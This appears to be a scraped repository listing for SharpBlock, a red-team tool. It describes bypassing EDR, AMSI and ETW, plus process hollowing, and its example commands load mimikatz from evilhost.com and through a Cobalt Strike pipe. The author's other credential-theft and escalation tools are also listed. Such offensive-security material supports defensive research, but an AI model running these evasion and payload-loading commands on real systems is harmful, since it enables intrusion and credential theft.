CCob/SharpBlock CCob/SharpBlock

  • Stars
    star
    1,114
  • Rank 41,670 (Top 0.9 %)
  • Language
    C#
  • Created over 4 years ago
  • Updated over 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
CCob/SharpBlock
github

CCob

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A method of bypassing EDR's active projection DLL's by preventing entry point exection

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts:

More Repositories

1

SweetPotato

Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019
C#
1,598
star
2

BeaconEye

Hunts out CobaltStrike beacons and logs operator command output
C#
879
star
3

ThreadlessInject

Threadless Process Injection using remote function hooking.
C#
718
star
4

BOF.NET

A .NET Runtime for Cobalt Strike's Beacon Object Files
C
668
star
5

lsarelayx

NTLM relaying for Windows made easy
C++
536
star
6

Volumiser

C#
332
star
7

okta-terrify

Okta Verify and Okta FastPass Abuse Tool
C#
286
star
8

MirrorDump

Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory
C#
259
star
9

MinHook.NET

A C# port of the MinHook API hooking library
C#
204
star
10

goreflect

Reflective DLL loading of your favorite Golang program
C
164
star
11

SylantStrike

Simple EDR implementation to demonstrate bypass
C
155
star
12

gssapi-abuse

A tool for enumerating potential hosts that are open to GSSAPI abuse within Active Directory networks
Python
137
star
13

DGPOEdit

Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
C#
135
star
14

Shwmae

C#
124
star
15

PIVert

C#
103
star
16

dnMerge

A lightweight .NET assembly dependency merger that uses dnLib and 7zip's LZMA SDK for compressing dependant assemblies.
C#
96
star
17

PinSwipe

Smart Card PIN swiping DLL
C
74
star
18

gookies

A Chrome cookie dumping utility
Go
46
star
19

PwnyForm

C#
42
star
20

ProvisionAppx

C#
36
star
21

bittrex4j

Java library for accessing the Bittrex Web API's and Web Sockets
Java
32
star
22

PoC

Exploit PoC for CVE's and non CVE's alike
Python
22
star
23

Jboss-Wilfly-Hashes-to-Hashcat

Converts JBoss/Wildfly management users properties file to hashcat format compatible with mode 20
Python
12
star
24

VulnHub

VulnHub Walkthroughs
Python
4
star
25

MediaPortal-AsteriskCid

C#
1
star